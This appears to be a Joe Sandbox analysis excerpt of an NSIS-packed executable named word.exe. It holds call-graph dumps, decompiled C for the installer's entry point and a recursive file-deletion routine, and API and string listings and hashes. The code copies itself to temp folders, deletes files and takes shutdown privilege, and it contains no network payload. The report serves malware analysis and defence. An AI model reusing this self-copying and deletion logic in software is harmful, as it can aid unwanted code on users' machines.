403fd6 2970->2972 2973 403fcc SetBkColor 2970->2973 2971->2970 2972->2963 2974 403ff0 CreateBrushIndirect 2972->2974 2975 403fe9 DeleteObject 2972->2975 2973->2972 2974->2963 2975->2974 2977 405b16 17 API calls 2976->2977 2978 403f00 SetDlgItemTextA 2977->2978 2978->2892 2980 401390 2979->2980 2981 4013fe 2980->2981 2982 4013cb MulDiv SendMessageA 2980->2982 2981->2889 2981->2907 2982->2980 2999 405b26 2983->2999 2984 405cea 2985 405cff 2984->2985 3019 405af4 lstrcpynA 2984->3019 2985->2921 2987 405cc1 lstrlenA 2987->2999 2989 405bfe GetSystemDirectoryA 2989->2999 2991 405b16 10 API calls 2991->2987 2993 405c11 GetWindowsDirectoryA 2993->2999 2994 405c21 SHGetSpecialFolderLocation 2995 405c3a SHGetPathFromIDListA CoTaskMemFree 2994->2995 2994->2999 2995->2999 2996 405c68 lstrcatA 2996->2999 2998 405b16 10 API calls 2998->2999 2999->2984 2999->2987 2999->2989 2999->2991 2999->2993 2999->2994 2999->2996 2999->2998 3003 4059db RegOpenKeyExA 2999->3003 3008 405d03 2999->3008 3017 405a52 wsprintfA 2999->3017 3018 405af4 lstrcpynA 2999->3018 3000->2931 3001->2934 3002->2937 3004 405a4c 3003->3004 3005 405a0e RegQueryValueExA 3003->3005 3004->2999 3006 405a2f RegCloseKey 3005->3006 3006->3004 3015 405d0f 3008->3015 3009 405d77 3010 405d7b CharPrevA 3009->3010 3013 405d96 3009->3013 3010->3009 3011 405d6c CharNextA 3011->3009 3011->3015 3013->2999 3014 405d5a CharNextA 3014->3015 3015->3009 3015->3011 3015->3014 3016 405d67 CharNextA 3015->3016 3020 405612 3015->3020 3016->3011 3017->2999 3018->2999 3019->2985 3021 405618 3020->3021 3022 40562b 3021->3022 3023 40561e CharNextA 3021->3023 3022->3015 3023->3021 4148 401923 4149 40195a 4148->4149 4150 402a85 17 API calls 4149->4150 4151 40195f 4150->4151 4152 405426 69 API calls 4151->4152 4153 401968 4152->4153 4159 404626 4160 404652 4159->4160 4161 404636 4159->4161 4162 404685 4160->4162 4163 404658 SHGetPathFromIDListA 4160->4163 4170 4053a6 GetDlgItemTextA 4161->4170 4165 40466f SendMessageA 4163->4165 4166 404668 4163->4166 4165->4162 4168 40140b 2 API calls 4166->4168 4167 404643 SendMessageA 4167->4160 4168->4165 4170->4167 4171 401926 4172 402a85 17 API calls 4171->4172 4173 40192d 4172->4173 4174 4053c2 MessageBoxIndirectA 4173->4174 4175 401936 4174->4175 4176 40152b 4177 402a68 17 API calls 4176->4177 4178 401532 4177->4178 4179 401fab SetErrorMode 4180 402061 4179->4180 4181 401fc8 4179->4181 4183 401423 24 API calls 4180->4183 4182 402a85 17 API calls 4181->4182 4184 401fcf 4182->4184 4185 40206c SetErrorMode 4183->4185 4186 402a85 17 API calls 4184->4186 4187 40291a 4185->4187 4188 401fd7 4186->4188 4189 401fec LoadLibraryExA 4188->4189 4190 401fdf GetModuleHandleA 4188->4190 4189->4180 4191 401ffc GetProcAddress 4189->4191 4190->4189 4190->4191 4192 402049 4191->4192 4193 40200c 4191->4193 4194 404e9f 24 API calls 4192->4194 4195 401423 24 API calls 4193->4195 4196 40201c 4193->4196 4194->4196 4195->4196 4196->4185 4197 402058 FreeLibrary 4196->4197 4197->4185 4198 40262f 4199 402636 4198->4199 4201 4028c7 4198->4201 4200 402a68 17 API calls 4199->4200 4202 402641 4200->4202 4203 402648 SetFilePointer 4202->4203 4203->4201 4204 402658 4203->4204 4206 405a52 wsprintfA 4204->4206 4206->4201 4207 401b30 4208 402a85 17 API calls 4207->4208 4209 401b37 4208->4209 4210 402a68 17 API calls 4209->4210 4211 401b40 wsprintfA 4210->4211 4212 40291a 4211->4212 4213 401a31 4214 402a85 17 API calls 4213->4214 4215 401a3a ExpandEnvironmentStringsA 4214->4215 4216 401a4e 4215->4216 4218 401a61 4215->4218 4217 401a53 lstrcmpA 4216->4217 4216->4218 4217->4218 4219 404333 4220 404371 4219->4220 4221 404364 4219->4221 4222 40437a GetDlgItem 4220->4222 4229 4043dd 4220->4229 4276 4053a6 GetDlgItemTextA 4221->4276 4225 40438c 4222->4225 4224 40436b 4227 405d03 5 API calls 4224->4227 4228 4043a0 SetWindowTextA 4225->4228 4231 40567b 4 API calls 4225->4231 4226 4044bf 4274 40460b 4226->4274 4278 4053a6 GetDlgItemTextA 4226->4278 4227->4220 4233 403ef5 18 API calls 4228->4233 4229->4226 4234 405b16 17 API calls 4229->4234 4229->4274 4236 404396 4231->4236 4232 403f5c 8 API calls 4237 40461f 4232->4237 4238 4043c0 4233->4238 4239 404451 SHBrowseForFolderA 4234->4239 4235 4044ee 4240 4056c8 20 API calls 4235->4240 4236->4228 4244 4055e7 3 API calls 4236->4244 4241 403ef5 18 API calls 4238->4241 4239->4226 4242 404469 CoTaskMemFree 4239->4242 4243 4044f4 4240->4243 4245 4043d0 4241->4245 4246 4055e7 3 API calls 4242->4246 4279 405af4 lstrcpynA 4243->4279 4244->4228 4277 403f2a SendMessageA 4245->4277 4248 404476 4246->4248 4251 4044ad SetDlgItemTextA 4248->4251 4255 405b16 17 API calls 4248->4255 4250 4043d6 4253 405dda 3 API calls 4250->4253 4251->4226 4252 40450b 4254 40567b 4 API calls 4252->4254 4253->4229 4256 404511 4254->4256 4257 404495 lstrcmpiA 4255->4257 4259 405dda 3 API calls 4256->4259 4257->4251 4258 4044a6 lstrcatA 4257->4258 4258->4251 4260 40451f 4259->4260 4261 40454a GetDiskFreeSpaceA 4260->4261 4263 40453b 4260->4263 4262 404565 MulDiv 4261->4262 4261->4263 4262->4263 4264 4045ba 4263->4264 4265 40468c 20 API calls 4263->4265 4266 4045dd 4264->4266 4268 40140b 2 API calls 4264->4268 4267 4045ac 4265->4267 4280 403f17 EnableWindow 4266->4280 4270 4045b1 4267->4270 4271 4045bc SetDlgItemTextA 4267->4271 4268->4266 4273 40468c 20 API calls 4270->4273 4271->4264 4272 4045f9 4272->4274 4281 4042c8 4272->4281 4273->4264 4274->4232 4276->4224 4277->4250 4278->4235 4279->4252 4280->4272 4282 4042d6 4281->4282 4283 4042db SendMessageA 4281->4283 4282->4283 4283->4274 4284 4014b7 4285 4014bd 4284->4285 4286 401389 2 API calls 4285->4286 4287 4014c5 4286->4287 4302 401cba 4303 402a68 17 API calls 4302->4303 4304 401cc0 IsWindow 4303->4304 4305 401a21 4304->4305 3433 4015bb 3434 402a85 17 API calls 3433->3434 3435 4015c2 3434->3435 3436 40567b 4 API calls 3435->3436 3446 4015ca 3436->3446 3437 401612 3438 401635 3437->3438 3439 401617 3437->3439 3443 401423 24 API calls 3438->3443 3451 401423 3439->3451 3440 405612 CharNextA 3442 4015d8 CreateDirectoryA 3440->3442 3445 4015ed GetLastError 3442->3445 3442->3446 3450 4021bf 3443->3450 3445->3446 3447 4015fa GetFileAttributesA 3445->3447 3446->3437 3446->3440 3447->3446 3449 401629 SetCurrentDirectoryA 3449->3450 3452 404e9f 24 API calls 3451->3452 3453 401431 3452->3453 3454 405af4 lstrcpynA 3453->3454 3454->3449 4306 40163c 4307 402a85 17 API calls 4306->4307 4308 401642 4307->4308 4309 405d9c 4 API calls 4308->4309 4310 401648 4309->4310 4311 40403d 4312 404053 4311->4312 4317 404160 4311->4317 4315 403ef5 18 API calls 4312->4315 4313 4041cf 4314 4042a3 4313->4314 4316 4041d9 GetDlgItem 4313->4316 4322 403f5c 8 API calls 4314->4322 4318 4040a9 4315->4318 4319 404261 4316->4319 4320 4041ef 4316->4320 4317->4313 4317->4314 4321 4041a4 GetDlgItem SendMessageA 4317->4321 4323 403ef5 18 API calls 4318->4323 4319->4314 4325 404273 4319->4325 4320->4319 4324 404215 6 API calls 4320->4324 4342 403f17 EnableWindow 4321->4342 4327 40429e 4322->4327 4328 4040b6 CheckDlgButton 4323->4328 4324->4319 4329 404279 SendMessageA 4325->4329 4330 40428a 4325->4330 4340 403f17 EnableWindow 4328->4340 4329->4330 4330->4327 4333 404290 SendMessageA 4330->4333 4331 4041ca 4334 4042c8 SendMessageA 4331->4334 4333->4327 4334->4313 4335 4040d4 GetDlgItem 4341 403f2a SendMessageA 4335->4341 4337 4040ea SendMessageA 4338 404111 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4337->4338 4339 404108 GetSysColor 4337->4339 4338->4327 4339->4338 4340->4335 4341->4337 4342->4331

                                                          Executed Functions

                                                          Function 004032FA Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 265filestringcomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 4032fa-403378 #17 OleInitialize SHGetFileInfoA call 405af4 GetCommandLineA call 405af4 GetModuleHandleA 5 403384-403399 call 405612 CharNextA 0->5 6 40337a-40337f 0->6 9 4033fe-403402 5->9 6->5 10 403404 9->10 11 40339b-40339e 9->11 14 403417-40342f GetTempPathA call 4032c6 10->14 12 4033a0-4033a4 11->12 13 4033a6-4033ae 11->13 12->12 12->13 15 4033b0-4033b1 13->15 16 4033b6-4033b9 13->16 24 403451-403468 DeleteFileA call 402c7d 14->24 25 403431-40344f GetWindowsDirectoryA lstrcatA call 4032c6 14->25 15->16 18 4033bb-4033bf 16->18 19 4033ee-4033fb call 405612 16->19 22 4033c1-4033ca 18->22 23 4033cf-4033d5 18->23 19->9 32 4033fd 19->32 22->23 27 4033cc 22->27 29 4033e5-4033ec 23->29 30 4033d7-4033e0 23->30 37 40346a-403470 24->37 38 4034cf-4034de ExitProcess OleUninitialize 24->38 25->24 25->38 27->23 29->19 35 403406-403412 call 405af4 29->35 30->29 34 4033e2 30->34 32->9 34->29 35->14 40 403472-40347b call 405612 37->40 41 4034bf-4034c6 call 4036a1 37->41 42 4034e4-4034f4 call 4053c2 ExitProcess 38->42 43 4035c9-4035cf 38->43 56 403486-403488 40->56 50 4034cb 41->50 47 4035d1-4035ee call 405dda * 3 43->47 48 40364c-403654 43->48 71 4035f0-4035f2 47->71 72 403638-403643 ExitWindowsEx 47->72 52 403656 48->52 53 40365a-40365e ExitProcess 48->53 50->38 52->53 58 40348a-403494 56->58 59 40347d-403483 56->59 62 403496-4034a3 call 4056c8 58->62 63 4034fa-403514 lstrcatA lstrcmpiA 58->63 59->58 61 403485 59->61 61->56 62->38 74 4034a5-4034bb call 405af4 * 2 62->74 63->38 65 403516-40352b CreateDirectoryA SetCurrentDirectoryA 63->65 68 403538-403552 call 405af4 65->68 69 40352d-403533 call 405af4 65->69 83 403557-403573 call 405b16 DeleteFileA 68->83 69->68 71->72 77 4035f4-4035f6 71->77 72->48 76 403645-403647 call 40140b 72->76 74->41 76->48 77->72 81 4035f8-40360a GetCurrentProcess 77->81 81->72 91 40360c-40362e 81->91 89 4035b4-4035bb 83->89 90 403575-403585 CopyFileA 83->90 89->83 93 4035bd-4035c4 call 405842 89->93 90->89 92 403587-4035a7 call 405842 call 405b16 call 405361 90->92 91->72 92->89 103 4035a9-4035b0 CloseHandle 92->103 93->38 103->89
                                                          C-Code - Quality: 68%
                                                          			_entry_() {
				struct _SHFILEINFOA _v356;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v392;
				int _v396;
				int _v400;
				signed int _v404;
				CHAR* _v408;
				int _v412;
				intOrPtr _v416;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				intOrPtr _t34;
				CHAR* _t38;
				char* _t41;
				signed int _t43;
				void* _t47;
				int _t49;
				signed int _t50;
				signed int _t53;
				int _t54;
				signed int _t58;
				void* _t77;
				void* _t87;
				void* _t89;
				char* _t94;
				signed int _t95;
				void* _t96;
				signed int _t97;
				signed int _t98;
				signed int _t101;
				CHAR* _t103;
				signed int _t104;
				void* _t105;
				char _t118;

				_t105 =  &_v384;
				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t97 = 0;
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x423fd4 = _t34;
				SHGetFileInfoA(0x41f4e8, 0,  &_v356, 0x160, 0); // executed
				E00405AF4(0x423720, "NSIS Error");
				_t38 = GetCommandLineA();
				_t94 = "C:\\Users\\Albus\\AppData\\Roaming\\word.exe";
				E00405AF4(_t94, _t38);
				 *0x423f20 = GetModuleHandleA(0);
				_t41 = _t94;
				if("C:\\Users\\Albus\\AppData\\Roaming\\word.exe" == 0x22) {
					_v404 = 0x22;
					_t41 =  &M00429001;
				}
				_t43 = CharNextA(E00405612(_t41, _v404));
				_v404 = _t43;
				while(1) {
					_t89 =  *_t43;
					_t107 = _t89;
					if(_t89 == 0) {
						break;
					}
					__eflags = _t89 - 0x20;
					if(_t89 != 0x20) {
						L5:
						__eflags =  *_t43 - 0x22;
						_v404 = 0x20;
						if( *_t43 == 0x22) {
							_t43 = _t43 + 1;
							__eflags = _t43;
							_v404 = 0x22;
						}
						__eflags =  *_t43 - 0x2f;
						if( *_t43 != 0x2f) {
							L15:
							_t43 = E00405612(_t43, _v404);
							__eflags =  *_t43 - 0x22;
							if(__eflags == 0) {
								_t43 = _t43 + 1;
								__eflags = _t43;
							}
							continue;
						} else {
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x53;
							if( *_t43 == 0x53) {
								__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
								if(( *(_t43 + 1) | 0x00000020) == 0x20) {
									_t97 = _t97 | 0x00000002;
									__eflags = _t97;
								}
							}
							__eflags =  *_t43 - 0x4352434e;
							if( *_t43 == 0x4352434e) {
								__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
								if(( *(_t43 + 4) | 0x00000020) == 0x20) {
									_t97 = _t97 | 0x00000004;
									__eflags = _t97;
								}
							}
							__eflags =  *((intOrPtr*)(_t43 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t43 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t43 - 2)) = 0;
								__eflags = _t43 + 2;
								E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", _t43 + 2);
								L20:
								_t103 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t103); // executed
								_t47 = E004032C6(_t107);
								_t108 = _t47;
								if(_t47 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t49 = E00402C7D(_t109, _t97); // executed
									_v412 = _t49;
									if(_t49 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v404 == 0) {
											__eflags =  *0x423fb4;
											if( *0x423fb4 != 0) {
												_t104 = E00405DDA(3);
												_t98 = E00405DDA(4);
												_t53 = E00405DDA(5);
												__eflags = _t104;
												_t95 = _t53;
												if(_t104 != 0) {
													__eflags = _t98;
													if(_t98 != 0) {
														__eflags = _t95;
														if(_t95 != 0) {
															_t58 =  *_t104(GetCurrentProcess(), 0x28,  &_v392);
															__eflags = _t58;
															if(_t58 != 0) {
																 *_t98(0, "SeShutdownPrivilege",  &_v396);
																_v412 = 1;
																_v400 = 2;
																 *_t95(_v416, 0,  &_v412, 0, 0, 0);
															}
														}
													}
												}
												_t54 = ExitWindowsEx(2, 0);
												__eflags = _t54;
												if(_t54 == 0) {
													E0040140B(9);
												}
											}
											_t50 =  *0x423fcc;
											__eflags = _t50 - 0xffffffff;
											if(_t50 != 0xffffffff) {
												_v396 = _t50;
											}
											ExitProcess(_v396);
										}
										E004053C2(_v404, 0x200010);
										ExitProcess(2);
									}
									if( *0x423f34 == 0) {
										L31:
										 *0x423fcc =  *0x423fcc | 0xffffffff;
										_v400 = E004036A1();
										goto L32;
									}
									_t101 = E00405612(_t94, 0);
									while(_t101 >= _t94) {
										__eflags =  *_t101 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t101 = _t101 - 1;
										__eflags = _t101;
									}
									_t113 = _t101 - _t94;
									_v408 = "Error launching installer";
									if(_t101 < _t94) {
										lstrcatA(_t103, "~nsu.tmp");
										if(lstrcmpiA(_t103, "C:\\Users\\Albus\\AppData\\Roaming") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t103, 0);
										SetCurrentDirectoryA(_t103);
										_t118 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
										if(_t118 == 0) {
											E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", "C:\\Users\\Albus\\AppData\\Roaming");
										}
										E00405AF4(0x424000, _v396);
										 *0x424400 = 0x41;
										_t96 = 0x1a;
										do {
											_push( *((intOrPtr*)( *0x423f28 + 0x120)));
											_push(0x41f0e8);
											E00405B16(0, _t96, 0x41f0e8);
											DeleteFileA(0x41f0e8);
											if(_v416 != 0 && CopyFileA("C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x41f0e8, 1) != 0) {
												_push(0);
												_push(0x41f0e8);
												E00405842();
												_push( *((intOrPtr*)( *0x423f28 + 0x124)));
												_push(0x41f0e8);
												E00405B16(0, _t96, 0x41f0e8);
												_t77 = E00405361(0x41f0e8);
												if(_t77 != 0) {
													CloseHandle(_t77);
													 *((intOrPtr*)(_t105 + 0x10)) = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t96 = _t96 - 1;
										} while (_t96 != 0);
										_push(0);
										_push(_t103);
										E00405842();
										goto L32;
									}
									 *_t101 = 0;
									_t102 = _t101 + 4;
									if(E004056C8(_t113, _t101 + 4) == 0) {
										goto L32;
									}
									E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", _t102);
									E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", _t102);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t103, 0x3fb);
								lstrcatA(_t103, "\\Temp");
								_t87 = E004032C6(_t108);
								_t109 = _t87;
								if(_t87 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t43 = _t43 + 1;
						__eflags =  *_t43 - 0x20;
					} while ( *_t43 == 0x20);
					goto L5;
				}
				goto L20;
			}







































                                                          0x004032fa
                                                          0x00403306
                                                          0x0040330a
                                                          0x00403312
                                                          0x00403314
                                                          0x00403319
                                                          0x00403320
                                                          0x00403326
                                                          0x0040333c
                                                          0x0040334c
                                                          0x00403351
                                                          0x00403357
                                                          0x0040335e
                                                          0x00403371
                                                          0x00403376
                                                          0x00403378
                                                          0x0040337a
                                                          0x0040337f
                                                          0x0040337f
                                                          0x0040338f
                                                          0x00403395
                                                          0x004033fe
                                                          0x004033fe
                                                          0x00403400
                                                          0x00403402
                                                          0x00000000
                                                          0x00000000
                                                          0x0040339b
                                                          0x0040339e
                                                          0x004033a6
                                                          0x004033a6
                                                          0x004033a9
                                                          0x004033ae
                                                          0x004033b0
                                                          0x004033b0
                                                          0x004033b1
                                                          0x004033b1
                                                          0x004033b6
                                                          0x004033b9
                                                          0x004033ee
                                                          0x004033f3
                                                          0x004033f8
                                                          0x004033fb
                                                          0x004033fd
                                                          0x004033fd
                                                          0x004033fd
                                                          0x00000000
                                                          0x004033bb
                                                          0x004033bb
                                                          0x004033bc
                                                          0x004033bf
                                                          0x004033c7
                                                          0x004033ca
                                                          0x004033cc
                                                          0x004033cc
                                                          0x004033cc
                                                          0x004033ca
                                                          0x004033cf
                                                          0x004033d5
                                                          0x004033dd
                                                          0x004033e0
                                                          0x004033e2
                                                          0x004033e2
                                                          0x004033e2
                                                          0x004033e0
                                                          0x004033e5
                                                          0x004033ec
                                                          0x00403406
                                                          0x00403409
                                                          0x00403412
                                                          0x00403417
                                                          0x00403417
                                                          0x00403422
                                                          0x00403428
                                                          0x0040342d
                                                          0x0040342f
                                                          0x00403451
                                                          0x00403456
                                                          0x0040345d
                                                          0x00403464
                                                          0x00403468
                                                          0x004034cf
                                                          0x004034cf
                                                          0x004034d4
                                                          0x004034de
                                                          0x004035c9
                                                          0x004035cf
                                                          0x004035da
                                                          0x004035e3
                                                          0x004035e5
                                                          0x004035ea
                                                          0x004035ec
                                                          0x004035ee
                                                          0x004035f0
                                                          0x004035f2
                                                          0x004035f4
                                                          0x004035f6
                                                          0x00403606
                                                          0x00403608
                                                          0x0040360a
                                                          0x00403617
                                                          0x00403626
                                                          0x0040362e
                                                          0x00403636
                                                          0x00403636
                                                          0x0040360a
                                                          0x004035f6
                                                          0x004035f2
                                                          0x0040363b
                                                          0x00403641
                                                          0x00403643
                                                          0x00403647
                                                          0x00403647
                                                          0x00403643
                                                          0x0040364c
                                                          0x00403651
                                                          0x00403654
                                                          0x00403656
                                                          0x00403656
                                                          0x0040365e
                                                          0x0040365e
                                                          0x004034ed
                                                          0x004034f4
                                                          0x004034f4
                                                          0x00403470
                                                          0x004034bf
                                                          0x004034bf
                                                          0x004034cb
                                                          0x00000000
                                                          0x004034cb
                                                          0x00403479
                                                          0x00403486
                                                          0x0040347d
                                                          0x00403483
                                                          0x00000000
                                                          0x00000000
                                                          0x00403485
                                                          0x00403485
                                                          0x00403485
                                                          0x0040348a
                                                          0x0040348c
                                                          0x00403494
                                                          0x00403500
                                                          0x00403514
                                                          0x00000000
                                                          0x00000000
                                                          0x00403518
                                                          0x0040351f
                                                          0x00403525
                                                          0x0040352b
                                                          0x00403533
                                                          0x00403533
                                                          0x00403541
                                                          0x00403548
                                                          0x00403551
                                                          0x00403557
                                                          0x0040355c
                                                          0x00403562
                                                          0x00403563
                                                          0x00403569
                                                          0x00403573
                                                          0x00403587
                                                          0x00403588
                                                          0x00403589
                                                          0x00403593
                                                          0x00403599
                                                          0x0040359a
                                                          0x004035a0
                                                          0x004035a7
                                                          0x004035aa
                                                          0x004035b0
                                                          0x004035b0
                                                          0x004035a7
                                                          0x004035b4
                                                          0x004035ba
                                                          0x004035ba
                                                          0x004035bd
                                                          0x004035be
                                                          0x004035bf
                                                          0x00000000
                                                          0x004035bf
                                                          0x00403496
                                                          0x00403498
                                                          0x004034a3
                                                          0x00000000
                                                          0x00000000
                                                          0x004034ab
                                                          0x004034b6
                                                          0x004034bb
                                                          0x00000000
                                                          0x004034bb
                                                          0x00403437
                                                          0x00403443
                                                          0x00403448
                                                          0x0040344d
                                                          0x0040344f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040344f
                                                          0x00000000
                                                          0x004033ec
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004033a0
                                                          0x004033a0
                                                          0x004033a0
                                                          0x004033a1
                                                          0x004033a1
                                                          0x00000000
                                                          0x004033a0
                                                          0x00000000

                                                          APIs
                                                          • #17.COMCTL32 ref: 00403319
                                                          • OleInitialize.OLE32(00000000), ref: 00403320
                                                          • SHGetFileInfoA.SHELL32(0041F4E8,00000000,?,00000160,00000000), ref: 0040333C
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                          • GetCommandLineA.KERNEL32(00423720,NSIS Error), ref: 00403351
                                                          • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 00403364
                                                          • CharNextA.USER32(00000000), ref: 0040338F
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403422
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403437
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403443
                                                          • DeleteFileA.KERNELBASE(1033), ref: 00403456
                                                          • ExitProcess.KERNELBASE(00000000), ref: 004034CF
                                                          • OleUninitialize.OLE32 ref: 004034D4
                                                          • ExitProcess.KERNEL32 ref: 004034F4
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,C:\Users\user\AppData\Roaming\word.exe,00000000,00000000), ref: 00403500
                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,C:\Users\user\AppData\Roaming\word.exe,00000000,00000000), ref: 0040350C
                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403518
                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040351F
                                                          • DeleteFileA.KERNEL32(0041F0E8,0041F0E8,?,00424000,?), ref: 00403569
                                                          • CopyFileA.KERNEL32 ref: 0040357D
                                                          • CloseHandle.KERNEL32(00000000), ref: 004035AA
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004035FF
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 0040363B
                                                          • ExitProcess.KERNEL32 ref: 0040365E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ExitFileProcess$Directory$CurrentDeleteHandleWindowslstrcat$CharCloseCommandCopyCreateInfoInitializeLineModuleNextPathTempUninitializelstrcmpilstrcpyn
                                                          • String ID: /D=$ _?=$"$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                          • API String ID: 3411505140-3365946949
                                                          • Opcode ID: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
                                                          • Instruction ID: 185554a669e391af13640c5e948e6a5ed170759bbde9d6c9181f60cdac0bc0dd
                                                          • Opcode Fuzzy Hash: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
                                                          • Instruction Fuzzy Hash: 2691E330A08341BED7216F619D49B2B7EACEB44306F44093BF541B62E2C77C9E058B6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405426 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 152filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 349 405426-405443 call 4056c8 352 405445-405457 DeleteFileA 349->352 353 40545c-405464 349->353 354 4055e1-4055e4 352->354 355 405466-405468 353->355 356 405477-405487 call 405af4 353->356 357 40558c-405592 355->357 358 40546e-405471 355->358 362 405496-405497 call 40562e 356->362 363 405489-405494 lstrcatA 356->363 357->354 361 405594-405597 357->361 358->356 358->357 364 4055a1-4055a9 call 405d9c 361->364 365 405599-40559f 361->365 366 40549c-4054c5 lstrcatA lstrlenA FindFirstFileA 362->366 363->366 364->354 374 4055ab-4055c0 call 4055e7 call 4057ac RemoveDirectoryA 364->374 365->354 369 405582-405586 366->369 370 4054cb-4054e2 call 405612 366->370 369->357 372 405588 369->372 378 4054e4-4054e8 370->378 379 4054ed-4054f0 370->379 372->357 389 4055c2-4055c6 374->389 390 4055d9-4055dc call 404e9f 374->390 378->379 381 4054ea 378->381 382 4054f2-4054f7 379->382 383 405503-405511 call 405af4 379->383 381->379 386 405561-405573 FindNextFileA 382->386 387 4054f9-4054fb 382->387 394 405513-40551b 383->394 395 405528-405537 call 4057ac DeleteFileA 383->395 386->370 392 405579-40557c FindClose 386->392 387->383 388 4054fd-405501 387->388 388->383 388->386 389->365 393 4055c8-4055d7 call 404e9f call 405842 389->393 390->354 392->369 393->354 394->386 398 40551d-405526 call 405426 394->398 405 405559-40555c call 404e9f 395->405 406 405539-40553d 395->406 398->386 405->386 409 405551-405557 406->409 410 40553f-40554f call 404e9f call 405842 406->410 409->386 410->386
                                                          C-Code - Quality: 94%
                                                          			E00405426(void* __edi, void* __eflags, signed int _a4, signed int _a8) {
				void* _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t38;
				char* _t50;
				signed int _t53;
				signed int _t56;
				signed int _t62;
				signed int _t64;
				void* _t66;
				CHAR* _t67;
				signed char _t68;
				CHAR* _t71;
				char* _t75;

				_t67 = _a4;
				_t38 = E004056C8(__eflags, _t67);
				_t68 = _a8;
				_v12 = _t38;
				if((_t68 & 0x00000008) != 0) {
					_t64 = DeleteFileA(_t67); // executed
					asm("sbb eax, eax");
					_t66 =  ~_t64 + 1;
					 *0x423fa8 =  *0x423fa8 + _t66;
					return _t66;
				}
				_a4 = _t68;
				_t7 =  &_a4;
				 *_t7 = _a4 & 0x00000001;
				__eflags =  *_t7;
				if( *_t7 == 0) {
					L5:
					E00405AF4(0x421538, _t67);
					__eflags = _a4;
					if(_a4 == 0) {
						E0040562E(_t67);
					} else {
						lstrcatA(0x421538, "\*.*");
					}
					lstrcatA(_t67, 0x409010);
